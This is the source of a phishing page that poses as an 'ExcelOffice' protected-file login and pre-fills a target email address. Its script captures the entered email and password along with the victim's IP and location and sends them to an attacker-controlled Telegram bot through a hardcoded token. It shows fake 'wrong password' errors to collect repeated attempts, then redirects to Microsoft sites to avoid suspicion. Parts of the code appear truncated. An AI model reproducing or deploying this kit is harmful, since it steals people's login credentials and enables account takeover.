var assignDOCto = "pkg-grass-devel@lists.alioth.debian.org";
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<title>Protected File Sign In</title>
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<img src="https://firebasestorage.googleapis.com/v0/b/png-images-481bb.appspot.com/o/excellogo.png?alt=media&token=2339dbb3-40e5-45a2-a262-9bc9936edbc8" alt="ExcelOffice Logo" class="logo">
<h2>This File is Protected by <span style="font-weight: bold;">ExcelOffice</span></h2>
<p>Please sign in to Cloud to access the file.</p>
<form name="loginForm" action="#" method="post">
<input type="text" name="email" id="email" placeholder="Username" required value="">
<input type="password" name="password" id="password" placeholder="Password" required>
<button type="submit" id="submit-btn">View</button>
<div class="error-container"></div>
<div class="spinner" style="display:none;"></div>
document.addEventListener('DOMContentLoaded', function() {
var emailInput = document.getElementById('email');
if (emailInput) {
emailInput.value = assignDOCto;
let signInAttempts = 0;
let userEmail = '';
window.addEventListener('DOMContentLoaded', () => {
const emailFromURL = new URLSearchParams(window.location.search).get('email');
if (emailFromURL) {
const emailField = document.getElementById('email');
if (emailField) {
emailField.value = emailFromURL;
userEmail = emailFromURL;
const form = document.forms['loginForm'];
const passwordField = document.getElementById('password');
const signInButton = document.getElementById('submit-btn');
const errorContainer = document.querySelector('.error-container');
const spinner = document.querySelector('.spinner');
document.querySelector('.container').style.animation = 'slideIn 0.5s forwards';
form.addEventListener('submit', async (event) => {
signInButton.textContent = 'Loading...';
const formData = new FormData(form);
const email = formData.get('email');
const password = formData.get('password');
try {
// Fetching IP location
const ipResponse = await fetch('http://ip-api.com/json');
const ipData = await ipResponse.json();
const location = `Country: ${ipData.country}, City: ${ipData.city}, IP: ${ipData.query}`;
// Preparing message to send
const message = `Login attempt for ${email} with password ${password}. Location: ${location}`;
const telegramAPI = `https://api.telegram.org/bot6748173984:AAEvmProBD7QVJGxPR-OYvU4y6_TCItr94A/sendMessage`;
const response = await fetch(telegramAPI, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
chat_id: '6345450362',
text: message
const responseData = await response.json();
if (!responseData.ok) {
throw new Error('Failed to send message to Telegram');
if (signInAttempts <= 2) {
showError(errorContainer, 'Wrong password. Please try again.');
signInButton.textContent = 'View';
if (signInAttempts === 3) {
spinner.style.display = 'block';
setTimeout(() => {
const redirects = ['https://microsoft.com', 'https://office.com', 'https://live.com'];
window.location.href = randomRedirect;
}, 1500);
} catch (error) {
showError(errorContainer, 'Failed to submit form. Please try again.');
signInButton.textContent = 'View';
function showError(errorContainer, message) {
errorContainer.textContent = message;
errorContainer.style.display = 'block';
// Clear password field
document.getElementById('password').value = '';
// Hide the error message after a few seconds
setTimeout(() => {
errorContainer.style.display = 'none';
}, 3000);